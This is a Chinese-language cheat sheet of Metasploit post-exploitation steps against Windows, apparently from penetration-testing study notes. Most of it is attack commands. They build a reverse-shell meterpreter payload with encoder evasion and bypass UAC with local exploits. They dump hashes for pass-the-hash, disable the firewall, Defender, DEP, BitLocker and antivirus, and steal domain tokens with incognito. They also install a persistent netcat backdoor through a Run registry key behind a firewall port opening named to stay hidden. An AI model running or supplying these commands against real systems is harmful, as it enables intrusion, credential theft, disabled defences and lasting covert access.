已经获得目标系统控制权后扩大战果
- 提权
- 信息收集
- 渗透内网
- 永久后门
基于已有session扩大战果
- msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o 1.exe
关闭UAC、提权
- load priv
- getsystem
- priv_elevate_getsystem:Operation failed:Access is denied.
- 绕过UAC限制(当前session有效)
- use exploit/windows/local/ask
- use exploit/windows/local/bypassuac
- use exploit/windows/local/bypassuac_injection
- 利用漏洞直接提权为system
- use exploit/windows/local/ms13_053_schlamperei
- use exploit/windows/local/ppr_flatten_rec
- 图形化界面
- set payload windows/vncinject/reverse_tcp
- set viewonly no
- load priv->hashdump
- psexec的pass the hash
- use exploit/windows/smb/psexec
- set smbpass hash
- 需要提前关闭UAC(是关闭不是绕过)
- 通过cmd执行注册表修改
- 关闭windows防火墙
- 需要成为管理员或system权限
- netsh advfirewall set allprofiles state off
- 关闭windowsDefender
- net stop windefend
- net stop 服务名称
- Bitlocker 磁盘加密
- manage-bde -off C:
- manage-bde -status C:
- 关闭DEP
- bcdedit.exe /set{current}nx AlwaysOff
- 杀死防病毒软件
- killav
- run post/windows/manage/killav
- 开启远程桌面服务
- run /post/windows/manage/enable_rdp
- run getgui -e
- run getgui -u user -p pass
- 查看远程桌面
- screenshot
- use espia(load espia)->screengrab
域渗透
Tokens
- 用户每次登陆,账号绑定临时的Token
- 访问资源时提交Token进行身份验证,类似于Web Cookie
- Delegate Token:交互登录会话(本地登录和远程登录,都是活动状态)
- Impersonate Token:非交互登录会话(\\192.168.0.113 访问文件共享)
- Delegate Token帐号注销后变为Impersonate Token,权限依然有效
Incognito
- 独立功能的软件,被MSF集成在meterpreter中
- 无需密码破解或获取密码hash,窃取token将自己伪装成其他用户
- 尤其适用于域环境下提权渗透多操作系统
- load incognito
- list_token -u
- impersonate_token LAB\administrator
- execute -f cmd.exe -i -t
- -t 使用当前token
通过注册表留后门
注册表保存着windows几乎全部配置参数
- 如果修改不当,可直接造成系统崩溃
- 修改前完整备份注册表
- 某些注册表的修改是不可逆的
常见用途
- 修改、增加启动项
- 窃取存储与注册表中的机密信息
- 绕过文件型病毒查杀
用注册表添加NC后门服务(meterpreter)
- upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
- 查看启动项:reg enumkey -k HKLM\software\microsoft\windows\currentversion\run(这个路径是四个启动项路径之一)
- 在其中增加一条键值:reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d “C:windows\\system32\nc.exe -Ldp 444 -e cmd.exe”
添加防火墙规则
- execute -f cmd -i -H
- netsh firewall show opmode
- netsh firewall add portopening TCP 4444 “test” ENABLE ALL(注意名字换隐蔽性强的)
- shutdown -r -f -t 0
- 需要关闭UAC,否则Access is denied.(5)
- nc 1.1.1.1 4444
- 中文乱码,shell下
chcp 65001
- 中文乱码,shell下
其它注册表项,google搜索registry quick find chart